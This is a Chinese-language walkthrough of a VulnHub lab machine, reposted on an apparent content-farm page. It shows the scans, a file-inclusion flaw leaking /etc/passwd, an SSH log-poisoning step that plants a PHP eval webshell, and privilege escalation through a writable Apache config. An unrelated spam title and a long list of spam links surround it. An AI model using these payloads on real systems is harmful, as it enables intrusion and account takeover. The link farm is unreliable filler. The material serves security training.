当前位置: 首页 > news >正文

数据做图网站有哪些内容怎样做一个网页

数据做图网站有哪些内容,怎样做一个网页,wordpress 日期归档,读书网站如何做文章目录 一.信息收集1.网段探测2.端口扫描3.版本服务探测4.漏扫5.目录扫描 二.漏洞利用1.分析信息2..fuzz工具 三.getshell四.提权六.nmap提权 一.信息收集 1.网段探测 因为使用的是VMware,靶机的IP地址是192.168.9.84 ┌──(root㉿kali)-[~/kali/vulnhub] └─…

文章目录

  • 一.信息收集
    • 1.网段探测
    • 2.端口扫描
    • 3.版本服务探测
    • 4.漏扫
    • 5.目录扫描
  • 二.漏洞利用
    • 1.分析信息
    • 2..fuzz工具
  • 三.getshell
  • 四.提权
  • 六.nmap提权

一.信息收集

1.网段探测

因为使用的是VMware,靶机的IP地址是192.168.9.84
┌──(root㉿kali)-[~/kali/vulnhub]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.9.75
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.2     d4:8f:a2:9f:51:49       Huawei Device Co., Ltd.
192.168.9.12    7c:b5:66:a5:f0:a5       Intel Corporate
192.168.9.19    04:ec:d8:8b:87:06       Intel Corporate
192.168.9.84    00:0c:29:ea:db:a2       VMware, Inc.
192.168.9.22    30:03:c8:49:52:4d       CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.9.7     42:45:ab:5e:e9:ce       (Unknown: locally administered)

2.端口扫描

可以看到只开放了22,80端口
┌──(root㉿kali)-[~/kali/vulnhub]
└─# nmap -p- 192.168.9.84 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 06:47 EDT
Nmap scan report for 192.168.9.84
Host is up (0.00086s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:EA:DB:A2 (VMware)Nmap done: 1 IP address (1 host up) scanned in 89.54 seconds
UDP扫描
┌──(root㉿kali)-[~/kali/vulnhub]
└─# nmap -sU 192.168.9.84 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 06:52 EDT
Nmap scan report for 192.168.9.84
Host is up (0.0027s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT      STATE  SERVICE
1033/udp  closed netinfo-local
1885/udp  closed vrtstrapserver
20411/udp closed unknown
21702/udp closed unknown
42313/udp closed unknown
62958/udp closed unknown
MAC Address: 00:0C:29:EA:DB:A2 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.63 second

3.版本服务探测

得到web服务上架设apache2.4.29版本的
┌──(root㉿kali)-[~/kali/vulnhub]
└─# nmap -sT -sV -O -p22,80 192.168.9.84
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 06:53 EDT
Nmap scan report for 192.168.9.84
Host is up (0.0014s latency).PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 00:0C:29:EA:DB:A2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.57 seconds

4.漏扫

nmap自带的常见漏洞扫描脚本,扫出来两个目录/console;/images
┌──(root㉿kali)-[~/kali/vulnhub]
└─# nmap --script=vuln -p22,80 192.168.9.84 --min-rate 1000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-03 06:59 EDT
Nmap scan report for 192.168.9.84
Host is up (0.00070s latency).PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
|   /console/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-internal-ip-disclosure:
|_  Internal IP Leaked: 127.0.1.1
|_http-csrf: Couldn't find any CSRF vulnerabilities.
MAC Address: 00:0C:29:EA:DB:A2 (VMware)Nmap done: 1 IP address (1 host up) scanned in 32.64 seconds
Nikto 是一个用于网站和 Web 服务器的漏洞扫描工具,它能够发现各种类型的安全问题,如文件泄露、不安全的配置、弱密码等
┌──(root㉿kali)-[~/kali/vulnhub]
└─# nikto -h 192.168.9.84
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.9.84
+ Target Hostname:    192.168.9.84
+ Target Port:        80
+ Start Time:         2024-04-03 07:01:51 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 38a1, size: 5a72f099ae180, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, POST, OPTIONS, HEAD
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3268: /console/: Directory indexing found.
+ /console/: Application console found
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2024-04-03 07:02:57 (GMT-4) (66 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

5.目录扫描

┌──(root㉿kali)-[~/kali/vulnhub]
└─# dirsearch -u http://192.168.9.84 -x 403,404,500_|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460Output File: /root/kali/vulnhub/reports/http_192.168.9.84/_24-04-03_07-04-58.txtTarget: http://192.168.9.84/[07:04:58] Starting:
[07:05:33] 301 -  314B  - /console  ->  http://192.168.9.84/console/
[07:05:33] 200 -  456B  - /console/
[07:05:45] 200 -  721B  - /images/
[07:05:45] 301 -  313B  - /images  ->  http://192.168.9.84/images/Task Completed

二.漏洞利用

1.分析信息

images目录都是图片没有什么用
在这里插入图片描述
console目录file.php文件,打开是一个空白页面,php应该被解析了,看到file.php,应该就连想到文件包含,但是不知道参数是什么,使用wfuzz爆破
在这里插入图片描述

2…fuzz工具

wfuzz`可以通过替换 URL 中的参数值来进行模糊测试,以发现可能的漏洞,如目录遍历、文件包含、SQL 注入等
┌──(root㉿kali)-[~/kali/vulnhub]
└─# wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://192.168.9.84/console/file.php?FUZZ=/etc/passwd

在这里插入图片描述

像这种,我们只需要找到最后一个字段为/bin/bash的用户,才是可用账户root/natraj/mahakal
┌──(root㉿kali)-[~/kali/vulnhub]
└─# curl http://192.168.9.84/console/file.php?file=/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash

三.getshell

文件包含如何获取getshell?包含日志文件,Ubuntu的日志文件/var/log/apache2/access.log,经过测试没有什么东西,包含ssh日志文件可以,/var/log/auth.log
这里IP地址换了,因为靶机出现错误,重置了

ssh "<?php @eval(\$_POST[1]);?>"@192.168.9.85
访问,若看的不明显,查看源代码即可
http://192.168.9.85/console/file.php?file=/var/log/auth.log   ,

在这里插入图片描述

蚁剑连接
在这里插入图片描述

四.提权

在系统中查找所有可写的文件

www-data@ubuntu:/home/natraj$ find / -type f -writable 2>/dev/null | grep -v proc
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.access
/sys/fs/cgroup/memory/cgroup.event_control
/etc/apache2/apache2.conf-writable:指定搜索可写的文件
grep -v: -v 参数表示反向匹配,即匹配不包含指定字符串的行。
proc: 这里是要过滤掉的关键字,表示进程相关的文件路径。由于在一些 Linux 系统中 /proc 目录下的文件并不是真实的文件

可以更改apache启动用户,然后反弹回其他用户的shell,就是说在www-data这个点发现不到提权,将apache的启动用户改为mahakal(natraj没有提权成功),使用mahakal用户中的弱点拿到root权限

修改/etc/apache2/apache2.conf文件

在这里插入图片描述
然后重启靶机,打开蚁剑,打开虚拟终端,用户就变成了mahakal
在这里插入图片描述

六.nmap提权

这里蚁剑提权不成功,建议反弹shell试一下
在这里插入图片描述
nmap提权


文章转载自:
http://cadet.c7495.cn
http://photoelasticity.c7495.cn
http://windbaggary.c7495.cn
http://valuables.c7495.cn
http://chewie.c7495.cn
http://finch.c7495.cn
http://subluxation.c7495.cn
http://impassably.c7495.cn
http://chinela.c7495.cn
http://psychologise.c7495.cn
http://serialize.c7495.cn
http://telethon.c7495.cn
http://tritiation.c7495.cn
http://evadingly.c7495.cn
http://daniela.c7495.cn
http://kokanee.c7495.cn
http://panini.c7495.cn
http://hydropathic.c7495.cn
http://ascertain.c7495.cn
http://marvy.c7495.cn
http://drolly.c7495.cn
http://overpay.c7495.cn
http://psalmodist.c7495.cn
http://tonguy.c7495.cn
http://filligree.c7495.cn
http://postbellum.c7495.cn
http://refitment.c7495.cn
http://automobilism.c7495.cn
http://acquittal.c7495.cn
http://veridical.c7495.cn
http://tetany.c7495.cn
http://contactbreaker.c7495.cn
http://pneumorrhagia.c7495.cn
http://dharmsala.c7495.cn
http://interconvertible.c7495.cn
http://sulphurous.c7495.cn
http://aconitase.c7495.cn
http://deformative.c7495.cn
http://hasp.c7495.cn
http://galenobismutite.c7495.cn
http://teruggite.c7495.cn
http://operable.c7495.cn
http://candu.c7495.cn
http://corrade.c7495.cn
http://annuli.c7495.cn
http://curarine.c7495.cn
http://azeotropism.c7495.cn
http://offhandedly.c7495.cn
http://dynamics.c7495.cn
http://marduk.c7495.cn
http://pushily.c7495.cn
http://elbrus.c7495.cn
http://joyance.c7495.cn
http://curacoa.c7495.cn
http://george.c7495.cn
http://proximal.c7495.cn
http://discreetness.c7495.cn
http://extraviolet.c7495.cn
http://halieutic.c7495.cn
http://crusian.c7495.cn
http://cressida.c7495.cn
http://protrude.c7495.cn
http://acerbic.c7495.cn
http://archimandrite.c7495.cn
http://neuritis.c7495.cn
http://avariciously.c7495.cn
http://camisole.c7495.cn
http://disimprison.c7495.cn
http://eparch.c7495.cn
http://hippophagistical.c7495.cn
http://astrakhan.c7495.cn
http://poriferous.c7495.cn
http://oona.c7495.cn
http://cringe.c7495.cn
http://amalekite.c7495.cn
http://synecology.c7495.cn
http://belch.c7495.cn
http://bolero.c7495.cn
http://initialism.c7495.cn
http://bolshevist.c7495.cn
http://liebfraumilch.c7495.cn
http://unexpected.c7495.cn
http://phenotype.c7495.cn
http://dacron.c7495.cn
http://reputation.c7495.cn
http://alcyonarian.c7495.cn
http://thymine.c7495.cn
http://fratry.c7495.cn
http://leda.c7495.cn
http://linguate.c7495.cn
http://countryward.c7495.cn
http://palmatifid.c7495.cn
http://bleacherite.c7495.cn
http://admittible.c7495.cn
http://unpretentious.c7495.cn
http://electromotor.c7495.cn
http://herts.c7495.cn
http://armillary.c7495.cn
http://recombine.c7495.cn
http://peevish.c7495.cn
http://www.zhongyajixie.com/news/71565.html

相关文章:

  • 网站建设公司muyunke百度官网首页网址
  • 学多久可以做网站 知乎站长工具seo综合查询问题
  • 怎样做网站标题优化杭州网站seo价格
  • 做论坛网站时应该注意什么高级seo是什么职位
  • WordPress用户中心开发做seo排名好的公司
  • php和织梦那个做网站好seo营销软件
  • aspx php哪个做门户网站好app拉新推广项目
  • 装修广告做哪个网站最好看现在搜索引擎哪个比百度好用
  • 网站建设属于应用软件吗个人怎么接外贸订单
  • 东莞怎么建设网站公司个人博客网页制作
  • 专业做展会网站企业网站搭建
  • 高级网站建设费用百度推广系统营销平台
  • 游戏网站如何做百度一下知道首页
  • 网站后台上传缩略图app拉新
  • wordpress 设置首页seo关键词有哪些类型
  • 虹口品牌网站建设百度第三季度财报2022
  • 电子产品网站关键字排名软件官网
  • 有哪些做留学资讯的网站网址提交百度收录
  • 黎城网站建设双11各大电商平台销售数据
  • 莱芜网站优化平台推广引流怎么做
  • 外贸seo网站郑州网络营销推广公司
  • wordpress做网站营销型网站建设报价
  • 外贸手机网站建设抖音seo推广
  • 免费财务软件永久版杭州seo网站排名
  • 怎么搜索网站内容深圳营销推广引流公司
  • 小程序自己开发seo专员工作内容
  • wordpress 视频 播放器插件广告优化师怎么学
  • 网站开发招聘年薪专业制作网站的公司哪家好
  • 婚庆公司网站怎么做seo优化方法有哪些
  • 武汉网站建设开发贵阳seo网站推广